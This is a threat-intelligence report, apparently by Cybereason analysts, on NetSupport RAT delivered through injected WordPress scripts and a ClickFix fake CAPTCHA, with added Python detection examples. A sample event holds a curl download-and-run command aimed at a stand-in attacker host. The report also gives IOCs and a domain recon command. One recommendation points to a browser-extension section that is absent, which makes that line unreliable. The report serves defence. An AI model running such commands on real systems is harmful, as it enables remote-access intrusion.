Deploying NetSupport RAT via WordPress & ClickFix

In May 2025, Cybereason Global Security Operations Center (GSOC) detected that threat actors have been hosting malicious WordPress websites to deliver malicious versions of the legitimate NetSupport Manager Remote Access Tool (RAT). 

This report analyzes the methods and tools used by threat actors to deploy the NetSupport RAT payload, focusing on the malicious JavaScript and associated techniques. It also includes relevant Indicators of Compromise (IOCs). 

Delivery Mechanism

Threat actors utilize phishing campaigns to distribute a malicious website link through:

  • Phishing emails
  • PDF attachments
  • Gaming websites


Attack Flow 

  1. Website Compromise: A malicious script injected into the compromised site creates an iframe when a victim visits the page.

  2. DOM Manipulation: The threat actor manipulates the Document Object Model (DOM) to display a fake CAPTCHA page.

  3. Payload Delivery: Users, following the fake CAPTCHA instructions, download the NetSupport RAT.

  4. Post-Infection: The threat actor connects to the NetSupport Client process and performs reconnaissance using the NetSupport Remote Command Prompt.


TECHNICAL ANALYSIS

Stage 1: iFrame Injection (j.js)

Through one of the identified delivery methods, an end user is redirected to a malicious website. Below is a screenshot of one such site that a user would encounter.


Threat actors embed malicious JavaScript into the meta description of the website’s index page. When a user's browser loads the page, it processes the meta tag and triggers the download and execution of a remote script (j.js) from the domain (islonline[.]org).


Threat actors additionally embed malicious JavaScript within the anchor tag of the "Home Page" link. As a result, when users click what seems to be a normal "Home Page" link, the browser tries to navigate to the home page while simultaneously loading and executing the malicious script (j.js).

The malicious website operated by the threat actor loads the following JavaScript files.


There are two versions of the malicious file j.js in the first stage of the attack. When the threat actor is offline, an empty j.js file is served.


When the threat actor is active, a modified version of the JavaScript file (j.js) is deployed. This script specifically targets users on the Windows operating system and performs the following actions:

  • Identifies the browser name and its user agent details.
  • Determines whether the victim is using a mobile device or a desktop.
  • Logs the date of script execution.
  • Generates an iframe to load a PHP file from the URL (https://AttackerDomain/files/index.php).


The malicious script (j.js) stores a data item called “lastvisit” in the browser’s local storage to track whether the user has previously visited the webpage. If the user has previously visited the site, the script refrains from generating the iframe, allowing the attacker to mask their presence.


Stage 2: DOM Script Injection (index.php)

The malicious file (index.php) dynamically generates a script element to inject JavaScript using the document.createElement() method.

In the below code block, the src attribute points to another malicious website that hosts the script (select.js). The iframe will load (select.js) script from the malicious URL.


The (select.js) file contains a script to load a fake CAPTCHA page.

Stage 3: Fake CAPTCHA Page (select.js) (ClickFix Technique)

The (select.js) script performs several DOM manipulations, such as injecting a Tailwind CSS stylesheet to style the CAPTCHA interface, removing existing stylesheets to override the website's original design, and rendering a React-based CAPTCHA challenge.


While appearing as a human verification step, the page employs navigator.clipboard.writeText(nE.command) to copy a malicious command to the user's clipboard. It then displays instructions, prompting the user to paste and execute it via the Windows Run dialog box (Win + R).


While multiple variations of the command were observed, each one ultimately downloads and executes a batch file containing the NetSupport Client files.
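The injection patterns described in Stages 1 to 3 can be checked for in a saved copy of a site's HTML; the following Python scanner is an added example, not code from the report or from NetSupport, and looks for a script tag riding on the meta description, a javascript: "Home Page" link, an iframe to an external PHP loader and a clipboard write. The allowlisted hosts, the attacker-domain.invalid hostname and the loadRemote() function name are assumptions, and the sample page is constructed.

```python
import re
from urllib.parse import urlparse

# Hosts this site is expected to load scripts or frames from (assumed allowlist).
TRUSTED_HOSTS = {"www.example-parish.test", "cdn.jsdelivr.net"}

# Constructed sample page modelled on the injection described above. Only islonline.org
# and the /files/index.php path come from the report; everything else is invented.
SAMPLE_HTML = """<html><head>
<meta name="description" content="Parish news"><script src="https://islonline.org/j.js"></script>
<script src="https://cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script>
</head><body>
<a href="javascript:loadRemote()">Home Page</a>
<iframe src="https://attacker-domain.invalid/files/index.php" style="display:none"></iframe>
<script>navigator.clipboard.writeText(nE.command);</script>
</body></html>"""

def host_of(url):
    return (urlparse(url).hostname or "").lower()

def scan_page(html):
    """Return (finding, detail) pairs for the Stage 1-3 injection patterns."""
    findings = []
    # Stage 1: remote script from a host the site does not normally use (j.js)
    for src in re.findall(r'<script[^>]+src=["\']([^"\']+)', html, re.I):
        if host_of(src) not in TRUSTED_HOSTS:
            findings.append(("untrusted-script-src", src))
    # Stage 1: a <script> opened directly after the meta description tag
    if re.search(r'<meta[^>]*name=["\']description["\'][^>]*>\s*<script', html, re.I):
        findings.append(("meta-description-script", "script tag adjacent to meta description"))
    # Stage 1: anchor using the javascript: scheme (the trojanised "Home Page" link)
    for href in re.findall(r'<a[^>]+href=["\']\s*(javascript:[^"\']*)', html, re.I):
        findings.append(("javascript-href", href))
    # Stage 2: iframe pulling a loader from an external host (index.php)
    for src in re.findall(r'<iframe[^>]+src=["\']([^"\']+)', html, re.I):
        if host_of(src) not in TRUSTED_HOSTS:
            findings.append(("external-iframe", src))
    # Stage 3: the clipboard write at the heart of the ClickFix lure
    if "navigator.clipboard.writeText" in html:
        findings.append(("clipboard-write", "navigator.clipboard.writeText present"))
    return findings

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_HTML):
        print(f"{kind:26} {detail}")
```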

Stage 4: Curl.exe (jfgf.bat)

Once run, the batch file does the following on the endpoint:

  • Retrieves a ZIP archive.
  • Leverages PowerShell to extract the archive’s contents into a folder in the %AppData%\Roaming directory under the current user profile.
  • Launches the NetSupport Client Application (client32.exe).
  • Establishes persistence by creating a Windows Registry Run key.
  • Performs cleanup by deleting the initial ZIP archive.


When opened in a text editor, the batch file includes large comment blocks filled with junk data between the commands. This is likely an obfuscation technique designed to evade inspection.

The deobfuscated version of the batch file is shown below.


The ZIP archive contains a fully staged deployment of NetSupport Client, accompanied by several supporting components. Upon extraction, the following files are present:

Filename         Description
client32.exe     NetSupport Client Application
client32.ini     NetSupport Client Configuration File
HTCTL32.DLL      NetSupport HTTP Transport
Mss32.dll        Miles Sound System
msvcp120.dll     Microsoft C Runtime Library
msvcr100.dll     Microsoft C Runtime Library
nskbfltr.inf     NS Keyboard Filter
NSM.ini          NetSupport Component File
NSM.LIC          NetSupport Licence File
pcicapi.dll      NetSupport pcicapi
PCICHEK.DLL      NetSupport pcichek
PCICL32.DLL      NetSupport Client DLL
pnf1.dll         iTop VPN
remcmdstub.exe   NetSupport Remote Command Prompt
TCCTL32.DLL      NetSupport TCP Transport

After launching, the NetSupport Client Application (client32.exe) establishes an outbound connection to the Connectivity Server specified in the client configuration file and then remains idle on the infected machine until the threat actor connects to it through the NetSupport Control.
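The Stage 3 and 4 chain (Run dialog, curl.exe, batch file, PowerShell extraction, client32.exe, Run key) leaves a recognisable trail in endpoint telemetry; the Python below is an added example, not from the report, that runs four such checks over constructed Sysmon-style events. The paths, PIDs, the HKCU hive and the exact Run-dialog command line are assumptions, since the report notes that several command variants were observed.

```python
# Constructed Sysmon-style events (process creation and registry set) modelled on the
# chain described above. Paths, PIDs and the Run-key value name are invented, the HKCU
# hive is an assumption, and the Run-dialog command line is one plausible variant.
U = r"C:\Users\victim\AppData"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",   # Win+R paste
     "cmd": rf"cmd /c curl -s https://attacker-domain.invalid/jfgf.bat -o {U}\Local\Temp\jfgf.bat && {U}\Local\Temp\jfgf.bat"},
    {"pid": 200, "ppid": 300, "image": r"C:\Windows\System32\curl.exe",
     "cmd": rf"curl -s https://attacker-domain.invalid/jfgf.bat -o {U}\Local\Temp\jfgf.bat"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": rf"powershell -c Expand-Archive -Path {U}\Local\Temp\ns.zip -DestinationPath {U}\Roaming\ns"},
    {"pid": 500, "ppid": 300, "image": rf"{U}\Roaming\ns\client32.exe", "cmd": "client32.exe"},
    {"pid": 300, "reg_key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ns",
     "reg_value": rf"{U}\Roaming\ns\client32.exe"},
]

def ancestor_images(event, by_pid, depth=2):
    """Lower-cased images of the parent and grandparent process."""
    out, parent = [], by_pid.get(event.get("ppid"))
    while parent and depth > 0:
        out.append(parent["image"].lower())
        parent, depth = by_pid.get(parent.get("ppid")), depth - 1
    return out

def detect(events):
    """Return (rule, pid) hits for the Stage 3 and 4 behaviours."""
    by_pid = {e["pid"]: e for e in events if "image" in e}
    hits = []
    for e in events:
        if "reg_key" in e:  # persistence: Run key pointing at the dropped client
            if "\\currentversion\\run\\" in e["reg_key"].lower() and e["reg_value"].lower().endswith("\\client32.exe"):
                hits.append(("run-key-netsupport", e["pid"]))
            continue
        img, cmd = e["image"].lower(), e["cmd"].lower()
        # ClickFix: curl.exe fetching a .bat with explorer.exe as parent or grandparent
        if img.endswith("\\curl.exe") and ".bat" in cmd and any(a.endswith("\\explorer.exe") for a in ancestor_images(e, by_pid)):
            hits.append(("clickfix-curl-batch", e["pid"]))
        # Batch step: PowerShell expanding the archive into the roaming profile
        if "powershell" in img and "expand-archive" in cmd and "\\appdata\\roaming" in cmd:
            hits.append(("expand-archive-to-appdata", e["pid"]))
        # NetSupport client launched from a user-writable directory
        if img.endswith("\\client32.exe") and "\\appdata\\roaming\\" in img:
            hits.append(("client32-in-appdata", e["pid"]))
    return hits

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:28} pid={pid}")
```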

The entire attack chain is illustrated below.


NetSupport Manager RAT Analysis

NetSupport Manager is a legitimate remote access tool developed for remote systems management, enabling IT teams to provide technical support, manage devices across multiple sites, and perform tasks such as file transfers, support chat, and inventory management. However, its complete feature set has made it an attractive target for threat actors, who have repurposed it to gain unauthorized access to systems, deploy additional malware, and conduct further attacks. 

According to a recent report, NetSupport Manager was the seventh most prevalent threat in 2024. The tool is frequently referred to as a malicious Remote Access Trojan rather than a benign Remote Access Tool due to its widespread exploitation.

The NetSupport Client Configuration file (client32.ini) is central to NetSupport’s functionality, as it defines how the Client connects to the Control system. This config file contains a GatewayAddress setting that specifies the IP address of the NetSupport Connectivity Server (Gateway). The NetSupport Connectivity Server is a component of NetSupport Manager that provides a method for connecting Clients and Controls over the internet using HTTP. 
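As an added triage helper (neither NetSupport's nor the report's code), this Python snippet pulls GatewayAddress out of a client32.ini and checks it against the 94.158.245.0/24 block the investigation tied to the Connectivity Servers. The [HTTP] section name and the optional ":port" suffix are assumptions about NetSupport's gateway settings; the sample ini is constructed around one of the gateway addresses listed in the report.

```python
import configparser
import ipaddress

# Network block the report associates with the observed Connectivity Servers.
SUSPECT_NETS = [ipaddress.ip_network("94.158.245.0/24")]

# Constructed client32.ini fragment. The [HTTP] section and the ":port" suffix are
# assumptions about NetSupport's gateway settings; the address is one listed in the report.
SAMPLE_INI = """[HTTP]
CMPI=60
GatewayAddress=94.158.245.104:443
Port=443
"""

def find_gateway(ini_text):
    """Return (section, GatewayAddress) from an ini, or (None, None) if absent."""
    cp = configparser.ConfigParser(interpolation=None, allow_no_value=True, strict=False)
    cp.read_string(ini_text)
    for section in cp.sections():
        if cp.has_option(section, "GatewayAddress"):
            return section, (cp.get(section, "GatewayAddress") or "").strip()
    return None, None

def classify_gateway(addr):
    """Triage verdict for a GatewayAddress value (assumed form: host or host:port)."""
    if not addr:
        return "no-gateway"
    host = addr.rsplit(":", 1)[0] if addr.count(":") == 1 else addr
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"            # DNS name: resolve and re-check the result
    if ip.is_private:
        return "internal-gateway"    # on-premises Connectivity Server
    if any(ip in net for net in SUSPECT_NETS):
        return "known-malicious-block"
    return "external-gateway"        # unexpected Internet gateway: verify with IT

if __name__ == "__main__":
    section, addr = find_gateway(SAMPLE_INI)
    print(section, addr, classify_gateway(addr))
```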


All NetSupport Connectivity Servers identified in the recent intrusion we investigated are located within the (94.158.245[.]0/24) network block, which is registered to MivoCloud SRL, a hosting provider operating data centers in Moldova. Shodan scans revealed that these IP addresses are associated with Windows Server operating systems and have exposed TCP/3389 (RDP) and TCP/443 (HTTPS) ports.


Post Exploitation

The full feature set offered by NetSupport Manager, including file transfer, remote command execution, and application launching, makes it an effective tool for conducting post-exploitation activities.


Within hours of initial compromise, threat actors have been observed connecting to the compromised endpoint, transferring files to the directory (C:\Users\Public\), and launching the NetSupport Remote Command Prompt (remcmdstub.exe) to execute reconnaissance commands, such as querying Active Directory for all computer accounts that are members of the "Domain Computers" group.

  • net group /domain "Domain Computers"


Indicators of Compromise (IOCs)


Recommendations

Once an affected endpoint is identified, immediate containment is critical, as threat actors have been observed operating within hours of initial compromise. The following actions are recommended to mitigate further risk:

  • Isolate and determine if forensic analysis needs to be performed. If it does, a forensic image (preservation copy) should be created for analysis to determine the scope of potential data at risk and the extent of threat actor activity. If not, proceed with internal/existing IT processes to restore to "gold image" (baseline).
  • Conduct a forensic analysis of the "at risk" data as identified within this article under Critical Takeaways section under "The extension accessed the following browser data:", which details specifically what data elements may be at risk and should be considered for inventorying, resetting, and for a potential follow-on investigation into unauthorized or unexpected activity.
  • Reset credentials associated with affected user accounts, especially those with administrative access.
  • Block identified IOCs (domains, IPs, hashes) across endpoints, networks, and other security appliances.
  • Reimage the infected system to ensure full eradication.
  • Educate users on recognizing suspicious activity and phishing attempts to reduce the risk of reinfection.

About the Authors

Cristian Carrillo Mendez, T1 GSOC Analyst
Cristian is a GSOC Analyst with the Cybereason Global SOC team, where he specializes in MalOp Investigations and has a strong interest in Threat Hunting. He holds several industry-recognized certifications, including GIAC GSEC, GCIH, and GPEN.


Hema Loganathan, T2 GSOC Analyst
Hema Loganathan is a GSOC Analyst with the Cybereason Global SOC team. She is involved in MalOp Investigation, Malware Analysis, Reverse Engineering and Threat Hunting. Hema has a Master of Science degree in Information Systems.

Cybereason Security Services Team